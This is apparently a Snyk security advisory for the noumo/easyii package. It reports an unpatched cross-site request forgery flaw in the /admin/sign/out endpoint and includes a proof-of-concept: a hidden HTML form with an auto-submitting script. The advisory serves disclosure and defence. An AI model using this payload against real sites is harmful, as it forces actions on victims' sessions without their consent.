Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for noumo/easyii.
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) via the manipulation of the /admin/sign/out file. An attacker can launch an attack remotely.
<form method='GET' action='http://example.com/admin/sign/out' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input style="display:none;" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>